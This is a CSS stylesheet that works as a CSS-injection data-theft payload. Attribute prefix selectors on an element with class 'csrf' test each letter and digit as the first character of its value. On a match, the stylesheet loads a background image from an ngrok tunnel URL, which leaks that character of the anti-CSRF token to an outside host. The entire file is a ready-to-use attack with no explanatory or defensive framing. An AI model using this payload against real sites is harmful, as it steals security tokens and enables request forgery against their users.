.csrf[value^="a"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=a);
}
.csrf[value^="b"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=b);
}
.csrf[value^="c"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=c);
}
.csrf[value^="d"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=d);
}
.csrf[value^="e"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=e);
}
.csrf[value^="f"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=f);
}
.csrf[value^="g"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=g);
}
.csrf[value^="h"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=h);
}
.csrf[value^="i"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=i);
}
.csrf[value^="j"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=j);
}
.csrf[value^="k"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=k);
}
.csrf[value^="l"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=l);
}
.csrf[value^="m"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=m);
}
.csrf[value^="n"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=n);
}
.csrf[value^="o"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=o);
}
.csrf[value^="p"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=p);
}
.csrf[value^="q"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=q);
}
.csrf[value^="r"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=r);
}
.csrf[value^="s"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=s);
}
.csrf[value^="t"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=t);
}
.csrf[value^="u"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=u);
}
.csrf[value^="v"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=v);
}
.csrf[value^="w"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=w);
}
.csrf[value^="x"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=x);
}
.csrf[value^="y"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=y);
}
.csrf[value^="z"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=z);
}
.csrf[value^="A"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=A);
}
.csrf[value^="B"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=B);
}
.csrf[value^="C"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=C);
}
.csrf[value^="D"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=D);
}
.csrf[value^="E"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=E);
}
.csrf[value^="F"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=F);
}
.csrf[value^="G"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=G);
}
.csrf[value^="H"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=H);
}
.csrf[value^="I"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=I);
}
.csrf[value^="J"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=J);
}
.csrf[value^="K"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=K);
}
.csrf[value^="L"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=L);
}
.csrf[value^="M"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=M);
}
.csrf[value^="N"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=N);
}
.csrf[value^="O"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=O);
}
.csrf[value^="P"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=P);
}
.csrf[value^="Q"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=Q);
}
.csrf[value^="R"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=R);
}
.csrf[value^="S"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=S);
}
.csrf[value^="T"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=T);
}
.csrf[value^="U"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=U);
}
.csrf[value^="V"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=V);
}
.csrf[value^="W"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=W);
}
.csrf[value^="X"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=X);
}
.csrf[value^="Y"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=Y);
}
.csrf[value^="Z"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=Z);
}
.csrf[value^="0"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=0);
}
.csrf[value^="1"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=1);
}
.csrf[value^="2"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=2);
}
.csrf[value^="3"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=3);
}
.csrf[value^="4"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=4);
}
.csrf[value^="5"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=5);
}
.csrf[value^="6"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=6);
}
.csrf[value^="7"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=7);
}
.csrf[value^="8"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=8);
}
.csrf[value^="9"] {
  --value: url(https://a813-2a01-e0a-7b-ba80-5cf3-ac8d-fc52-72ab.ngrok-free.app/?value=9);
}
.csrf {
  background: var(--value, none);
}
